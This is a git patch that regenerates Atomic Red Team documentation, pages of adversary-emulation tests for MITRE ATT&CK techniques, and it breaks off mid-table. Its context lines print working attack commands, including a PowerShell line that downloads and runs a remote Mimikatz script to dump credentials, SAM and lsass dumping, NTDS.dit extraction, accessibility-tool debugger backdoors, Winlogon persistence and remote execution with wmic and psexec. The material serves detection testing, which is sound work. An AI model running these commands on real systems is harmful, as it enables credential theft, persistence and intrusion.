From 75c332ac528e48d360f6dcfdbfbb258bc7ba6baf Mon Sep 17 00:00:00 2001 
From: CircleCI Atomic Red Team doc generator Date: Thu, 29 Aug 2019 22:18:28 +0000 Subject: [PATCH] Generate docs from job=validate_atomics_generate_docs branch=master --- atomics/T1002/T1002.md | 15 +++++-------- atomics/T1003/T1003.md | 30 +++++++++----------------- atomics/T1004/T1004.md | 9 +++----- atomics/T1005/T1005.md | 3 +-- atomics/T1007/T1007.md | 6 ++---- atomics/T1009/T1009.md | 3 +-- atomics/T1010/T1010.md | 3 +-- atomics/T1012/T1012.md | 3 +-- atomics/T1014/T1014.md | 9 +++----- atomics/T1015/T1015.md | 21 ++++++------------ atomics/T1016/T1016.md | 6 ++---- atomics/T1018/T1018.md | 15 +++++-------- atomics/T1022/T1022.md | 12 ++++------- atomics/T1027/T1027.md | 3 +-- atomics/T1028/T1028.md | 15 +++++-------- atomics/T1030/T1030.md | 3 +-- atomics/T1031/T1031.md | 3 +-- atomics/T1033/T1033.md | 6 ++---- atomics/T1035/T1035.md | 3 +-- atomics/T1036/T1036.md | 6 ++---- atomics/T1037/T1037.md | 6 ++---- atomics/T1040/T1040.md | 12 ++++------- atomics/T1042/T1042.md | 3 +-- atomics/T1046/T1046.md | 6 ++---- atomics/T1047/T1047.md | 12 ++++------- atomics/T1048/T1048.md | 12 ++++------- atomics/T1049/T1049.md | 9 +++----- atomics/T1050/T1050.md | 6 ++---- atomics/T1053/T1053.md | 9 +++----- atomics/T1055/T1055.md | 12 ++++------- atomics/T1056/T1056.md | 3 +-- atomics/T1057/T1057.md | 3 +-- atomics/T1059/T1059.md | 3 +-- atomics/T1060/T1060.md | 12 ++++------- atomics/T1062/T1062.md | 3 +-- atomics/T1063/T1063.md | 12 ++++------- atomics/T1064/T1064.md | 3 +-- atomics/T1065/T1065.md | 6 ++---- atomics/T1069/T1069.md | 9 +++----- atomics/T1070/T1070.md | 15 +++++-------- atomics/T1071/T1071.md | 15 +++++-------- atomics/T1074/T1074.md | 6 ++---- atomics/T1075/T1075.md | 3 +-- atomics/T1076/T1076.md | 3 +-- atomics/T1077/T1077.md | 6 ++---- atomics/T1081/T1081.md | 12 ++++------- atomics/T1082/T1082.md | 15 +++++-------- atomics/T1083/T1083.md | 12 ++++------- atomics/T1084/T1084.md | 6 ++---- atomics/T1085/T1085.md | 3 +-- atomics/T1086/T1086.md | 36 
+++++++++++-------------------- atomics/T1087/T1087.md | 33 ++++++++++------------------- atomics/T1088/T1088.md | 12 ++++------- atomics/T1089/T1089.md | 30 +++++++++----------------- atomics/T1090/T1090.md | 3 +-- atomics/T1096/T1096.md | 3 +-- atomics/T1097/T1097.md | 3 +-- atomics/T1098/T1098.md | 3 +-- atomics/T1099/T1099.md | 21 ++++++------------ atomics/T1100/T1100.md | 3 +-- atomics/T1101/T1101.md | 3 +-- atomics/T1103/T1103.md | 3 +-- atomics/T1105/T1105.md | 27 ++++++++---------------- atomics/T1107/T1107.md | 36 +++++++++++-------------------- atomics/T1110/T1110.md | 3 +-- atomics/T1112/T1112.md | 9 +++----- atomics/T1113/T1113.md | 12 ++++------- atomics/T1114/T1114.md | 3 +-- atomics/T1115/T1115.md | 6 ++---- atomics/T1117/T1117.md | 9 +++----- atomics/T1118/T1118.md | 6 ++---- atomics/T1119/T1119.md | 6 ++---- atomics/T1121/T1121.md | 6 ++---- atomics/T1122/T1122.md | 3 +-- atomics/T1123/T1123.md | 6 ++---- atomics/T1124/T1124.md | 6 ++---- atomics/T1126/T1126.md | 9 +++----- atomics/T1127/T1127.md | 3 +-- atomics/T1128/T1128.md | 3 +-- atomics/T1130/T1130.md | 3 +-- atomics/T1132/T1132.md | 3 +-- atomics/T1134/T1134.md | 3 +-- atomics/T1135/T1135.md | 9 +++----- atomics/T1136/T1136.md | 15 +++++-------- atomics/T1137/T1137.md | 3 +-- atomics/T1138/T1138.md | 3 +-- atomics/T1139/T1139.md | 3 +-- atomics/T1140/T1140.md | 6 ++---- atomics/T1141/T1141.md | 6 ++---- atomics/T1142/T1142.md | 3 +-- atomics/T1144/T1144.md | 3 +-- atomics/T1145/T1145.md | 12 ++++------- atomics/T1146/T1146.md | 18 ++++++---------- atomics/T1147/T1147.md | 3 +-- atomics/T1148/T1148.md | 6 ++---- atomics/T1150/T1150.md | 3 +-- atomics/T1151/T1151.md | 3 +-- atomics/T1152/T1152.md | 3 +-- atomics/T1153/T1153.md | 6 ++---- atomics/T1154/T1154.md | 3 +-- atomics/T1155/T1155.md | 3 +-- atomics/T1156/T1156.md | 6 ++---- atomics/T1158/T1158.md | 36 +++++++++++-------------------- atomics/T1159/T1159.md | 3 +-- atomics/T1160/T1160.md | 3 +-- atomics/T1163/T1163.md | 3 +-- 
atomics/T1164/T1164.md | 6 ++---- atomics/T1165/T1165.md | 6 ++---- atomics/T1166/T1166.md | 9 +++----- atomics/T1168/T1168.md | 9 +++----- atomics/T1169/T1169.md | 3 +-- atomics/T1170/T1170.md | 3 +-- atomics/T1173/T1173.md | 3 +-- atomics/T1174/T1174.md | 3 +-- atomics/T1176/T1176.md | 9 +++----- atomics/T1179/T1179.md | 3 +-- atomics/T1180/T1180.md | 3 +-- atomics/T1183/T1183.md | 6 ++---- atomics/T1191/T1191.md | 6 ++---- atomics/T1193/T1193.md | 3 +-- atomics/T1196/T1196.md | 3 +-- atomics/T1197/T1197.md | 9 +++----- atomics/T1201/T1201.md | 21 ++++++------------ atomics/T1202/T1202.md | 6 ++---- atomics/T1206/T1206.md | 6 ++---- atomics/T1207/T1207.md | 3 +-- atomics/T1214/T1214.md | 3 +-- atomics/T1216/T1216.md | 3 +-- atomics/T1217/T1217.md | 6 ++---- atomics/T1218/T1218.md | 9 +++----- atomics/T1220/T1220.md | 12 ++++------- atomics/T1222/T1222.md | 48 ++++++++++++++---------------------------- atomics/T1223/T1223.md | 6 ++---- atomics/T1482/T1482.md | 6 ++---- atomics/T1485/T1485.md | 15 +++++-------- atomics/T1489/T1489.md | 9 +++----- atomics/T1490/T1490.md | 12 ++++------- atomics/T1496/T1496.md | 3 +-- atomics/T1501/T1501.md | 6 ++---- atomics/index.yaml | 2 ++ 140 files changed, 384 insertions(+), 764 deletions(-) diff --git a/atomics/T1002/T1002.md b/atomics/T1002/T1002.md index 956d1344..0288b4a2 100644 --- a/atomics/T1002/T1002.md +++ b/atomics/T1002/T1002.md @@ -29,8 +29,7 @@ An adversary may compress data (e.g., sensitive documents) that is collected pri | input_file | Path that should be compressed into our output file | Path | C:\*| | output_file | Path where resulting compressed data should be placed | Path | C:\test\Data.zip| -#### Run it with `powershell`! -``` +#### Run it with `powershell`! ``` dir #{input_file} -Recurse | Compress-Archive -DestinationPath #{output_file} ```
@@ -48,8 +47,7 @@ An adversary may compress data (e.g., sensitive documents) that is collected pri | input_file | Path that should be compressed into our output file | Path | *.docx| | output_file | Path where resulting compressed data should be placed | Path | exfilthis.rar| -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` rar a -r #{output_file} #{input_file} ```
@@ -67,8 +65,7 @@ An adversary may compress data (e.g., sensitive documents) that is collected pri | input_files | Path that should be compressed into our output file, may include wildcards | Path | /tmp/victim-files/*| | output_file | Path that should be output as a zip archive | Path | /tmp/victim-files.zip| -#### Run it with `sh`! -``` +#### Run it with `sh`! ``` zip #{output_file} #{input_files} ```
@@ -85,8 +82,7 @@ An adversary may compress data (e.g., sensitive documents) that is collected pri |------|-------------|------|---------------| | input_file | Path that should be compressed | Path | /tmp/victim-gzip.txt| -#### Run it with `sh`! -``` +#### Run it with `sh`! ``` gzip -f #{input_file} ```
@@ -104,8 +100,7 @@ An adversary may compress data (e.g., sensitive documents) that is collected pri | input_file_folder | Path that should be compressed | Path | /tmp/victim-files/| | output_file | File that should be output | Path | /tmp/victim-files.tar.gz| -#### Run it with `sh`! -``` +#### Run it with `sh`! ``` tar -cvzf #{output_file} #{input_file_folder} ```
diff --git a/atomics/T1003/T1003.md b/atomics/T1003/T1003.md index 768817ec..fe0820f5 100644 --- a/atomics/T1003/T1003.md +++ b/atomics/T1003/T1003.md @@ -169,8 +169,7 @@ Dumps Credentials via Powershell by invoking a remote mimikatz script |------|-------------|------|---------------| | remote_script | URL to a remote Mimikatz script that dumps credentials | Url | https://raw.githubusercontent.com/EmpireProject/Empire/dev/data/module_source/credentials/Invoke-Mimikatz.ps1| -#### Run it with `powershell`! -``` +#### Run it with `powershell`! ``` IEX (New-Object Net.WebClient).DownloadString('#{remote_script}'); Invoke-Mimikatz -DumpCreds ```
@@ -182,8 +181,7 @@ https://www.truesec.se/sakerhet/verktyg/saakerhet/gsecdump_v2.0b5 **Supported Platforms:** Windows -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` gsecdump -a ```
@@ -200,8 +198,7 @@ http://www.ampliasecurity.com/research/windows-credentials-editor/ |------|-------------|------|---------------| | output_file | Path where resulting data should be placed | Path | output.txt| -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` wce -o #{output_file} ```
@@ -214,8 +211,7 @@ via three registry keys. Then processed locally using https://github.com/Neohaps **Supported Platforms:** Windows -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` reg save HKLM\sam sam reg save HKLM\system system reg save HKLM\security security @@ -235,8 +231,7 @@ ProcDump. The tool may be downloaded from https://docs.microsoft.com/en-us/sysin |------|-------------|------|---------------| | output_file | Path where resulting dump should be placed | Path | lsass_dump.dmp| -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` procdump.exe -accepteula -ma lsass.exe #{output_file} ```
@@ -249,8 +244,7 @@ Manager and administrative permissions. **Supported Platforms:** Windows -#### Run it with these steps! -1. Open Task Manager: +#### Run it with these steps! 1. Open Task Manager: On a Windows system this can be accomplished by pressing CTRL-ALT-DEL and selecting Task Manager or by right-clicking on the task bar and selecting "Task Manager". @@ -277,8 +271,7 @@ Mimikatz. This tool is available at https://github.com/gentilkiwi/mimikatz. |------|-------------|------|---------------| | input_file | Path where resulting dump should be placed | Path | lsass_dump.dmp| -#### Run it with these steps! -1. Open Mimikatz: +#### Run it with these steps! 1. Open Mimikatz: Execute `mimikatz` at a command prompt. 2. Select a Memory Dump: @@ -304,8 +297,7 @@ subsequent domain controllers without the need of network-based replication. |------|-------------|------|---------------| | output_folder | Path where resulting dump should be placed | Path | C:\Atomic_Red_Team| -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` ntdsutil “ac i ntds” “ifm” “create full #{output_folder} q q ```
@@ -322,8 +314,7 @@ The Active Directory database NTDS.dit may be dumped by copying it from a Volume |------|-------------|------|---------------| | drive_letter | Drive letter to source VSC (including colon) | String | C:| -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` vssadmin.exe create shadow /for=#{drive_letter} ```
@@ -345,8 +336,7 @@ This test must be executed on a Windows Domain Controller. | vsc_name | Name of Volume Shadow Copy | String | \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1| | extract_path | Path for extracted NTDS.dit | Path | C:\Extract| -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` copy #{vsc_name}\Windows\NTDS\NTDS.dit #{extract_path}\ntds.dit copy #{vsc_name}\Windows\System32\config\SYSTEM #{extract_path}\VSC_SYSTEM_HIVE reg save HKLM\SYSTEM #{extract_path}\SYSTEM_HIVE diff --git a/atomics/T1004/T1004.md b/atomics/T1004/T1004.md index 01b4d876..0a497269 100644 --- a/atomics/T1004/T1004.md +++ b/atomics/T1004/T1004.md @@ -32,8 +32,7 @@ PowerShell code to set Winlogon shell key to execute a binary at logon along wit |------|-------------|------|---------------| | binary_to_execute | Path of binary to execute | Path | C:\Windows\System32\cmd.exe| -#### Run it with `powershell`! -``` +#### Run it with `powershell`! ``` Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Shell" "explorer.exe, #{binary_to_execute}" -Force ```
@@ -50,8 +49,7 @@ PowerShell code to set Winlogon userinit key to execute a binary at logon along |------|-------------|------|---------------| | binary_to_execute | Path of binary to execute | Path | C:\Windows\System32\cmd.exe| -#### Run it with `powershell`! -``` +#### Run it with `powershell`! ``` Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Userinit" "Userinit.exe, #{binary_to_execute}" -Force ```
@@ -68,8 +66,7 @@ PowerShell code to set Winlogon Notify key to execute a notification package DLL |------|-------------|------|---------------| | binary_to_execute | Path of notification package to execute | Path | C:\Windows\Temp\atomicNotificationPackage.dll| -#### Run it with `powershell`! -``` +#### Run it with `powershell`! ``` New-Item "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify" -Force Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify" "logon" "#{binary_to_execute}" -Force ``` diff --git a/atomics/T1005/T1005.md b/atomics/T1005/T1005.md index 52e7c770..5256f06a 100644 --- a/atomics/T1005/T1005.md +++ b/atomics/T1005/T1005.md @@ -22,8 +22,7 @@ This test uses `grep` to search a macOS Safari binaryCookies file for specified |------|-------------|------|---------------| | search_string | String to search Safari cookies to find. | string | coinbase| -#### Run it with `sh`! -``` +#### Run it with `sh`! ``` cd ~/Library/Cookies grep -q "#{search_string}" "Cookies.binarycookies" ``` diff --git a/atomics/T1007/T1007.md b/atomics/T1007/T1007.md index ebad1753..3c5471b8 100644 --- a/atomics/T1007/T1007.md +++ b/atomics/T1007/T1007.md @@ -22,8 +22,7 @@ Identify system services |------|-------------|------|---------------| | service_name | Name of service to start stop, query | string | svchost.exe| -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` tasklist.exe sc query sc query state= all @@ -45,8 +44,7 @@ Enumerates started system services using net.exe and writes them to a file. This |------|-------------|------|---------------| | output_file | Path of file to hold net.exe output | Path | C:\Windows\Temp\service-list.txt| -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` net.exe start >> #{output_file} ```
diff --git a/atomics/T1009/T1009.md b/atomics/T1009/T1009.md index 2362559e..532af8e9 100644 --- a/atomics/T1009/T1009.md +++ b/atomics/T1009/T1009.md @@ -20,8 +20,7 @@ Uses dd to add a zero to the binary to change the hash |------|-------------|------|---------------| | file_to_pad | Path of binary to be padded | Path | /tmp/evil-binary| -#### Run it with `sh`! -``` +#### Run it with `sh`! ``` dd if=/dev/zero bs=1 count=1 >> #{file_to_pad} ```
diff --git a/atomics/T1010/T1010.md b/atomics/T1010/T1010.md index 0d45205c..d2a68afc 100644 --- a/atomics/T1010/T1010.md +++ b/atomics/T1010/T1010.md @@ -23,8 +23,7 @@ Compiles and executes C# code to list main window titles associated with each pr | input_source_code | Path to source of C# code | path | C:\AtomicRedTeam\atomics\T1010\src\T1010.cs| | output_file_name | Name of output binary | string | T1010.exe| -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe -out:#{output_file_name} #{input_source_code} #{output_file_name} ``` diff --git a/atomics/T1012/T1012.md b/atomics/T1012/T1012.md index 02ee4fc5..5ceb2028 100644 --- a/atomics/T1012/T1012.md +++ b/atomics/T1012/T1012.md @@ -28,8 +28,7 @@ https://www.offensive-security.com/wp-content/uploads/2015/04/wp.Registry_Quick_ **Supported Platforms:** Windows -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows" reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce diff --git a/atomics/T1014/T1014.md b/atomics/T1014/T1014.md index 560a570f..62cff54e 100644 --- a/atomics/T1014/T1014.md +++ b/atomics/T1014/T1014.md @@ -26,8 +26,7 @@ Loadable Kernel Module based Rootkit |------|-------------|------|---------------| | rootkit_file | Path To Module | String | Module.ko| -#### Run it with `sh`! -``` +#### Run it with `sh`! ``` sudo insmod #{rootkit_file} ```
@@ -44,8 +43,7 @@ Loadable Kernel Module based Rootkit |------|-------------|------|---------------| | rootkit_file | Path To Module | String | Module.ko| -#### Run it with `sh`! -``` +#### Run it with `sh`! ``` sudo modprobe #{rootkit_file} ```
@@ -69,8 +67,7 @@ It would be wise if you only run this in a test environment |------|-------------|------|---------------| | driver_path | Path to the vulnerable driver | Path | C:\Drivers\driver.sys| -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` puppetstrings #{driver_path} ```
diff --git a/atomics/T1015/T1015.md b/atomics/T1015/T1015.md index 07be8405..f692fd90 100644 --- a/atomics/T1015/T1015.md +++ b/atomics/T1015/T1015.md @@ -48,8 +48,7 @@ This allows adversaries to execute the attached process |------|-------------|------|---------------| | target_executable | File You Want To Attach cmd To | String | osk.exe| -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f ```
@@ -66,8 +65,7 @@ This allows adversaries to execute the attached process |------|-------------|------|---------------| | target_executable | File You Want To Attach cmd To | String | sethc.exe| -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f ```
@@ -84,8 +82,7 @@ This allows adversaries to execute the attached process |------|-------------|------|---------------| | target_executable | File You Want To Attach cmd To | String | utilman.exe| -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f ```
@@ -102,8 +99,7 @@ This allows adversaries to execute the attached process |------|-------------|------|---------------| | target_executable | File You Want To Attach cmd To | String | magnify.exe| -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f ```
@@ -120,8 +116,7 @@ This allows adversaries to execute the attached process |------|-------------|------|---------------| | target_executable | File You Want To Attach cmd To | String | narrator.exe| -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f ```
@@ -138,8 +133,7 @@ This allows adversaries to execute the attached process |------|-------------|------|---------------| | target_executable | File You Want To Attach cmd To | String | DisplaySwitch.exe| -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f ```
@@ -156,8 +150,7 @@ This allows adversaries to execute the attached process |------|-------------|------|---------------| | target_executable | File You Want To Attach cmd To | String | atbroker.exe| -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f ```
diff --git a/atomics/T1016/T1016.md b/atomics/T1016/T1016.md index e883ea7d..e48be6ac 100644 --- a/atomics/T1016/T1016.md +++ b/atomics/T1016/T1016.md @@ -17,8 +17,7 @@ Identify network configuration information **Supported Platforms:** Windows -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` ipconfig /all netsh interface show arp -a @@ -34,8 +33,7 @@ Identify network configuration information **Supported Platforms:** macOS, Linux -#### Run it with `sh`! -``` +#### Run it with `sh`! ``` arp -a netstat -ant | awk '{print $NF}' | grep -v '[a-z]' | sort | uniq -c ifconfig diff --git a/atomics/T1018/T1018.md b/atomics/T1018/T1018.md index c0e5d778..ed10dabd 100644 --- a/atomics/T1018/T1018.md +++ b/atomics/T1018/T1018.md @@ -35,8 +35,7 @@ Identify remote systems with net.exe **Supported Platforms:** Windows -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` net view /domain net view ``` @@ -49,8 +48,7 @@ Identify remote systems via ping sweep **Supported Platforms:** Windows -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i ```
@@ -62,8 +60,7 @@ Identify remote systems via arp **Supported Platforms:** Windows -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` arp -a ```
@@ -75,8 +72,7 @@ Identify remote systems via arp **Supported Platforms:** Linux, macOS -#### Run it with `sh`! -``` +#### Run it with `sh`! ``` arp -a | grep -v '^?' ```
@@ -88,8 +84,7 @@ Identify remote systems via ping sweep **Supported Platforms:** Linux, macOS -#### Run it with `sh`! -``` +#### Run it with `sh`! ``` for ip in $(seq 1 254); do ping -c 1 192.168.1.$ip -o; [ $? -eq 0 ] && echo "192.168.1.$ip UP" || : ; done ```
diff --git a/atomics/T1022/T1022.md b/atomics/T1022/T1022.md index 93c58c81..82a3d4c0 100644 --- a/atomics/T1022/T1022.md +++ b/atomics/T1022/T1022.md @@ -23,8 +23,7 @@ Encrypt data for exiltration **Supported Platforms:** macOS, CentOS, Ubuntu, Linux -#### Run it with `sh`! -``` +#### Run it with `sh`! ``` echo "This file will be encrypted" > /tmp/victim-gpg.txt mkdir /tmp/victim-files cd /tmp/victim-files @@ -44,8 +43,7 @@ rar a -p"blue" hello.rar (VARIANT) **Supported Platforms:** Windows -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` mkdir ./tmp/victim-files cd ./tmp/victim-files echo "This file will be encrypted" > ./encrypted_file.txt @@ -62,8 +60,7 @@ wzzip sample.zip -s"blueblue" *.txt (VARIANT) **Supported Platforms:** Windows -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` path=%path%;"C:\Program Files (x86)\winzip" mkdir ./tmp/victim-files cd ./tmp/victim-files @@ -80,8 +77,7 @@ Note: Requires 7zip installation **Supported Platforms:** Windows -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` mkdir ./tmp/victim-files cd ./tmp/victim-files echo "This file will be encrypted" > ./encrypted_file.txt diff --git a/atomics/T1027/T1027.md b/atomics/T1027/T1027.md index 00975b3b..94f3e137 100644 --- a/atomics/T1027/T1027.md +++ b/atomics/T1027/T1027.md @@ -23,8 +23,7 @@ Creates a base64-encoded data file and decodes it into an executable shell scrip **Supported Platforms:** macOS, Linux -#### Run it with `sh`! -``` +#### Run it with `sh`! ``` sh -c "echo ZWNobyBIZWxsbyBmcm9tIHRoZSBBdG9taWMgUmVkIFRlYW0= > /tmp/encoded.dat" cat /tmp/encoded.dat | base64 -d > /tmp/art.sh chmod +x /tmp/art.sh diff --git a/atomics/T1028/T1028.md b/atomics/T1028/T1028.md index 46137e06..1926fa0a 100644 --- a/atomics/T1028/T1028.md +++ b/atomics/T1028/T1028.md 
@@ -23,8 +23,7 @@ Powershell Enable WinRM **Supported Platforms:** Windows -#### Run it with `powershell`! -``` +#### Run it with `powershell`! ``` Enable-PSRemoting -Force ```
@@ -45,8 +44,7 @@ https://blog.cobaltstrike.com/2017/01/24/scripting-matt-nelsons-mmc20-applicatio |------|-------------|------|---------------| | computer_name | Name of Computer | string | computer1| -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` powershell.exe [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.application","#{computer_name}")).Documnet.ActiveView.ExecuteShellCommand("c:\windows\system32\calc.exe", $null, $null, "7") ```
@@ -65,8 +63,7 @@ Utilize WMIC to start remote process | password | Password | String | P@ssw0rd1| | computer_name | Target Computer Name | String | Target| -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` wmic /user:#{user_name} /password:#{password} /node:#{computer_name} process call create "C:\Windows\system32\reg.exe add \"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe\" /v \"Debugger\" /t REG_SZ /d \"cmd.exe\" /f" ```
@@ -85,8 +82,7 @@ Utilize psexec to start remote process | password | Password | String | P@ssw0rd1| | computer_name | Target Computer Name | String | Target| -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` psexec \\host -u domain\user -p password -s cmd.exe ```
@@ -104,8 +100,7 @@ Execute Invoke-command on remote host | host_name | Remote Windows Host Name | String | Test| | remote_command | Command to execute on remote Host | String | ipconfig| -#### Run it with `powershell`! -``` +#### Run it with `powershell`! ``` invoke-command -computer_name #{host_name} -scriptblock {#{remote_command}} ```
diff --git a/atomics/T1030/T1030.md b/atomics/T1030/T1030.md index 75ec66b6..d101540e 100644 --- a/atomics/T1030/T1030.md +++ b/atomics/T1030/T1030.md @@ -15,8 +15,7 @@ Take a file/directory, split it into 5Mb chunks **Supported Platforms:** macOS, CentOS, Ubuntu, Linux -#### Run it with `sh`! -``` +#### Run it with `sh`! ``` cd /tmp/ dd if=/dev/urandom of=/tmp/victim-whole-file bs=25M count=1 split -b 5000000 /tmp/victim-whole-file diff --git a/atomics/T1031/T1031.md b/atomics/T1031/T1031.md index 121ab272..4ebe169d 100644 --- a/atomics/T1031/T1031.md +++ b/atomics/T1031/T1031.md @@ -20,8 +20,7 @@ and will then revert the binPath change, restoring Fax to its original state. **Supported Platforms:** Windows -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` sc config Fax binPath= "C:\windows\system32\WindowsPowerShell\v1.0\powershell.exe -noexit -c \"write-host 'T1031 Test'\"" sc start Fax sc config Fax binPath= "C:\WINDOWS\system32\fxssvc.exe" diff --git a/atomics/T1033/T1033.md b/atomics/T1033/T1033.md index d8513de8..a6fa0b62 100644 --- a/atomics/T1033/T1033.md +++ b/atomics/T1033/T1033.md @@ -32,8 +32,7 @@ Identify System owner or users on an endpoint |------|-------------|------|---------------| | computer_name | Name of remote computer | string | computer1| -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` cmd.exe /C whoami wmic useraccount get /ALL quser /SERVER:"#{computer_name}" @@ -52,8 +51,7 @@ Identify System owner or users on an endpoint **Supported Platforms:** Linux, macOS -#### Run it with `sh`! -``` +#### Run it with `sh`! ``` users w who diff --git a/atomics/T1035/T1035.md b/atomics/T1035/T1035.md index d3c5c675..7cb247e6 100644 --- a/atomics/T1035/T1035.md +++ b/atomics/T1035/T1035.md 
@@ -21,8 +21,7 @@ Creates a service specifying an aribrary command and executes it. When executing | service_name | Name of service to create | string | ARTService| | executable_command | Command to execute as a service | string | %COMSPEC% /c powershell.exe -nop -w hidden -command New-Item -ItemType File C:\art-marker.txt| -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` sc.exe create #{service_name} binPath= #{executable_command} sc.exe start #{service_name} sc.exe delete #{service_name} diff --git a/atomics/T1036/T1036.md b/atomics/T1036/T1036.md index 1860baed..de06418b 100644 --- a/atomics/T1036/T1036.md +++ b/atomics/T1036/T1036.md @@ -31,8 +31,7 @@ Copies cmd.exe, renames it, and launches it to masquerade as an instance of lsas **Supported Platforms:** Windows -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` cmd.exe /c copy %SystemRoot%\System32\cmd.exe %SystemRoot%\Temp\lsass.exe cmd.exe /c %SystemRoot%\Temp\lsass.exe ``` @@ -45,8 +44,7 @@ Copies sh process, renames it as crond, and executes it to masquerade as the cro **Supported Platforms:** Linux -#### Run it with `sh`! -``` +#### Run it with `sh`! ``` cp /bin/sh /tmp/crond /tmp/crond ``` diff --git a/atomics/T1037/T1037.md b/atomics/T1037/T1037.md index b1cf6169..65f9f38f 100644 --- a/atomics/T1037/T1037.md +++ b/atomics/T1037/T1037.md @@ -30,8 +30,7 @@ Added Via Reg.exe |------|-------------|------|---------------| | script_command | Command To Execute | String | cmd.exe /c calc.exe| -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` REG.exe ADD HKCU\Environment /v UserInitMprLogonScript /t REG_MULTI_SZ /d "#{script_command}" ```
@@ -43,8 +42,7 @@ Mac logon script **Supported Platforms:** macOS -#### Run it with these steps! -1. Create the required plist file +#### Run it with these steps! 1. Create the required plist file sudo touch /private/var/root/Library/Preferences/com.apple.loginwindow.plist diff --git a/atomics/T1040/T1040.md b/atomics/T1040/T1040.md index 5f97548d..3c55520d 100644 --- a/atomics/T1040/T1040.md +++ b/atomics/T1040/T1040.md @@ -30,8 +30,7 @@ Perform a PCAP. Wireshark will be required for tshark. TCPdump may already be in |------|-------------|------|---------------| | interface | Specify interface to perform PCAP on. | String | ens33| -#### Run it with `bash`! -``` +#### Run it with `bash`! ``` tcpdump -c 5 -nnni #{interface} tshark -c 5 -i #{interface} ``` @@ -49,8 +48,7 @@ Perform a PCAP on MacOS. This will require Wireshark/tshark to be installed. TCP |------|-------------|------|---------------| | interface | Specify interface to perform PCAP on. | String | en0A| -#### Run it with `bash`! -``` +#### Run it with `bash`! ``` tcpdump -c 5 -nnni #{interface} tshark -c 5 -i #{interface} ``` @@ -69,8 +67,7 @@ installed, along with WinPCAP. Windump will require the windump executable. |------|-------------|------|---------------| | interface | Specify interface to perform PCAP on. | String | Ethernet0| -#### Run it with `command_prompt`! -``` +#### Run it with `command_prompt`! ``` c:\Program Files\Wireshark\tshark.exe -i #{interface} -c 5 c:\windump.exe ``` @@ -89,8 +86,7 @@ installed, along with WinPCAP. Windump will require the windump executable. |------|-------------|------|---------------| | interface | Specify interface to 